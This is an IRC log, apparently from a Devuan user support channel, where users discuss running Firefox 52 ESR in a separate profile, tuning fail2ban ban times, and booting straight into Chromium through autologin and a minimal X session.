nemo | jordila: http://ftp.mozilla.org/pub/firefox/releases/52.9.0esr/ | 16:52 |
jordila | nemo, i was reading on https://mozilla.debian.net/ that ... | 16:52 |
nemo | er | 16:52 |
nemo | https://ftp.mozilla.org/pub/firefox/releases/52.9.0esr/ | 16:52 |
jordila | could it be that i'm able to add repo's for v52 à la 'Debian Mozilla' team... or may have i dreamed it ? | 16:53 |
nemo | jordila: 52 is unsupported simple as that. I don't think it's a good idea to have it outside your user folder at all | 16:54 |
nemo | jordila: ideally keep it in a separate account | 16:54 |
nemo | in maybe a jail | 16:54 |
jordila | ah | 16:54 |
nemo | while there's certainly good reasons to have it, it's not really safe to use | 16:55 |
nemo | jordila: definitely use noscript and turn off plugins when browsing web | 16:55 |
nemo | jordila: just use the mozilla zip in a user home | 16:56 |
nemo | maybe clone one of your firefox profiles | 16:56 |
nemo | jordila: do you know about -no-remote and -P ? | 16:56 |
jordila | no to yet, nemo. | 16:57 |
system16 | im in the fail2ban conf file right now | 16:57 |
jordila | (typo : not yet, nemo ) | 16:58 |
system16 | should i enable ssh_ddos ? | 16:58 |
system16 | its False | 16:58 |
system16 | also the fail2ban is working. i managed to get my phone banned for 10 min | 16:58 |
system16 | i want to change bantime to 2hrs | 16:59 |
jordila | nemo , what is -no-remote and -P ? | 16:59 |
nemo | jordila: -P is for launching alternate profiles -no-remote ensures if you have firefox already running the new one doesn't try to use it instead | 17:10 |
nemo | jordila: so... firefox -no-remote -P unsafeLegacyProfile | 17:11 |
system16 | nemo | 17:11 |
nemo | make a shortcut like that | 17:11 |
system16 | my phone is banned for 20000 | 17:11 |
system16 | seconds | 17:11 |
system16 | 2000* | 17:11 |
nemo | system16: ssh ddos? can't hurt. | 17:12 |
jordila | nemo , i think i might go in other direction ... instead of downgrading, i wouldrather upgrade to the very last (Nightly) Firefox version ? | 17:13 |
nemo | jordila: I did that myself, just to get more usable addons... and 'cause I was already using nightly anyway | 17:13 |
nemo | jordila: I'd still suggest backing up profile | 17:13 |
jordila | nice to know , nemo | 17:14 |
nemo | jordila: cp -r your existing firefox profile to a new name and use the profile manager to add it | 17:14 |
system16 | nemo since i didnt know what it exactly does, i didnt touch it | 17:14 |
nemo | that way if nightly or the addosn you installed in nightly eff something up, nbd | 17:14 |
nemo | jordila: https://support.mozilla.org/en-US/kb/profile-manager-create-and-remove-firefox-profiles | 17:15 |
nemo | jordila: it's funny how few people know of this feature that firefox has had for like... since forever. since it was the Mozilla web browser | 17:15 |
nemo | chrome finally adds profiles, people get super excited. firefox adds the container thing "oh, you mean like chrome profiles?" NO | 17:16 |
nemo | jordila: firefox -no-remote -P to launch the profile manager to set all this up | 17:16 |
system16 | yelp | 17:17 |
system16 | 2018-11-23 16:20:35,100 fail2ban.actions[2641]: INFO Set banTime = 600 | 17:17 |
nemo | (their walkthrough says "close all firefox" meh, whatever -no-remote is more convenient) | 17:17 |
system16 | it didnt do shit' | 17:17 |
system16 | i added bantime = 2000 to every section | 17:17 |
system16 | there was no bantime in that conf file. i was told to maunaly add it | 17:18 |
premoboss | hi dudes. i am using lightdm and LXDE with autimatic login. the pc is dedicated only to web surfing. i will like to avoid lxde and run as soon as the PC start a web navigator (ie. chromium). there is a way to do that? | 17:32 |
jonadab | premoboss: Most obvious way is to create a custom session type. | 17:33 |
jonadab | There should be how-to documents online for how to create a custom X11 session, I think. | 17:34 |
premoboss | jonadab, i dont know how to do. can you poin me out that howto if you know where it is? i tried ot search but probably i user the wrong keywords in google bbecause i dont find good infos. | 17:35 |
jonadab | I don't happen to know off the top of my head. I've done it before, but it's been a while. | 17:35 |
jonadab | Try the phrase "custom X11 session", or something like that. | 17:35 |
premoboss | thanks. | 17:36 |
jonadab | Or maybe man 5 xsession | 17:37 |
jonadab | As best I can remember, you create two things: The session itself is an executable file (usually a simple shell script) that starts the things you want. If you're starting multiple things, all but the last one should be started in the background with &. You typically put this file in /usr/local/bin | 17:41 |
jonadab | And the other thing is a description file that the display manager (or startx or whatever) can read in order to know that this type of session is available. This is a text file in a specific config-like format that specifies things like what the session is called in the list of possible session types, what program to run for it, and a couple of other things. | 17:42 |
jonadab | This has to go in a particular directory, and that location is the main part that I don't remember off the top of my head. | 17:42 |
jonadab | You can copy one of the existing ones and edit it, that's what I did. | 17:42 |
jonadab | Ah, /usr/share/xsessions is the magic location, I think. | 17:44 |
jonadab | HTH.HAND. | 17:44 |
premoboss | nice to know, thanks jonadab. i go to try | 17:55 |
errandir1 | why run lightdm in the first place if you want to autologin? After auto login just do startx to start the WM | 17:57 |
premoboss | errandir1, because i am going to modify an exixtying distro, i man not building from scratch. | 17:58 |
errandir1 | sure, but you can disable any service you don't need in any distro | 18:00 |
premoboss | errandir1, my need is: start a graphocal application (firefos or chromium) as soon as the PC start. the need is to do autologon in the pc and to minimize the start up time from "turn on pc" to "usable firefox" | 18:01 |
jonadab | errandir1: lightdm is one way to _do_ autologin, I think. | 18:02 |
iovec | agetty can do autologin, don't need a DM for that | 18:03 |
errandir1 | to me it's just too heavy a hammer, and premoboss wants to minimize the startup time. To minimize that start by not running anything you don't need | 18:04 |
jonadab | All true, as far as it goes. | 18:04 |
jonadab | But sometimes people design things based on what they already know how to do. | 18:05 |
jonadab | But yes, console autologin + startx in the login script would be more efficient, technically. | 18:05 |
premoboss | errandir1, i already disabled daemons, recompiled kernel to reduce his size and his time to load. now i must work on GUI. if you know better way to follow, please tell me. i can remove lighdm and lxde, the important ting is login and to run automatically chromium at login. | 18:06 |
premoboss | at login = at start of the pc. | 18:06 |
errandir1 | you'll need lxde to show chromium | 18:07 |
errandir1 | start like iovec says, get agetty to do the autologin | 18:07 |
errandir1 | lxde will read the .Xclients file when it starts, so start chromium from there. | 18:08 |
premoboss | errandir1, is it not possible to stat chtomiom on X server without to have lxde between X and cromium? | 18:08 |
errandir1 | maybe, I've never tried that myself. All the other stuf I have done | 18:09 |
iovec | premoboss: possible, just execute int chromium in your xinitrc script | 18:22 |
premoboss | gonna try, thanks. | 18:22 |
iovec | keep in mind you would have no window management available, and no auxillary daemons for session management, so either use a DE/WM, or for them in the background before executing into it. | 18:22 |
iovec | fork* | 18:23 |
jonadab | premoboss: There has to _be_ a window manager. LXDE isn't the only option, there may be something lighter weight, but there has to be one. | 18:31 |
jonadab | Dunno of twm is still actively maintained. fvwm probably. Not sure how these compare to lxde. | 18:31 |
jonadab | Oh, actually, look at tiling window managers though. | 18:31 |
jonadab | There are several of those, they tend to be pretty lightweight. | 18:31 |
jonadab | ratpoison was the first, I think, but it may not be current now. | 18:32 |
telst4r | dwm. | 18:32 |
premoboss | i user twm in past, i will give a look even if it was very "perimitive" but also very light | 18:32 |
telst4r | or something that sucks less. | 18:32 |
jonadab | If you can get chromium to only ever use one window ever, no dialog boxes or anything, then the window manager could potentially be _extremely_ lightweight. | 18:33 |
jonadab | But I don't know if chromium can be quite that window-sparse. Most applications cannot. | 18:34 |
koollman | there doesn't have to be one, but it's very, very limited without one :) | 18:35 |
forester | Hi. Have a Devuan 2 live CD a modemmanager? | 19:35 |
forester | to use usb modem for internet access | 19:36 |
filipdevuan_ | so funny https://systemd-free.artixlinux.org/img/systemd-devours-all.gif | 20:33 |
furrywolf | lol | 20:36 |
newsanchor | Devuan sucks. It destroyed my computer. Any thoughts? | 20:36 |
iovec | i sympathize with you | 20:37 |
filipdevuan_ | how did devuan destroy your computer?? | 20:39 |
newsanchor | it freezes if it has to perform more than 3 tasks. And I know it is unpopular to say but it worked with windows | 20:41 |
newsanchor | does anyone have a solution for Linux ASUS T100A compatibility? | 20:42 |
filipdevuan_ | what tasks are these any tasks?? or any specific software?? :D | 20:42 |
newsanchor | receiving e-mail in thunderbird and browsing at the same time is too much for HIM now...:( | 20:45 |
newsanchor | So, downloading data... | 20:46 |
Anselmo | is this unique to devuan or is it just a linux thing, | 20:46 |
filipdevuan_ | thats really weird and i dont know why maybe u should use different email client for example claws mail | 20:47 |
newsanchor | I tried. Beacause I really wanted linux to work, but it didn't help | 20:48 |
Anselmo | the issue is, lack of memory ? | 20:49 |
Anselmo | are you just, running outof memory and swapping ? | 20:50 |
newsanchor | Devuan also didn't work on HP EliteBook 2760p/162A. But the HP works with Ubuntu. Do not know why... | 20:51 |
newsanchor | I don't think that I lack on memory | 20:52 |
newsanchor | And the HP didn't even want to start. MAybe I am just Devuan unlucky | 20:52 |
Anselmo | hrm | 20:53 |
filipdevuan_ | so i believe its not devuan that sucks but your laptop | 22:04 |
filipdevuan_ | hey if synaptic package manager has outdated version of some app how can i download the newer one using termninal?? | 23:51 |
Generated by irclog2html.py 2.17.0 by Marius Gedminas - find it at https://mg.pov.lt/irclog2html/!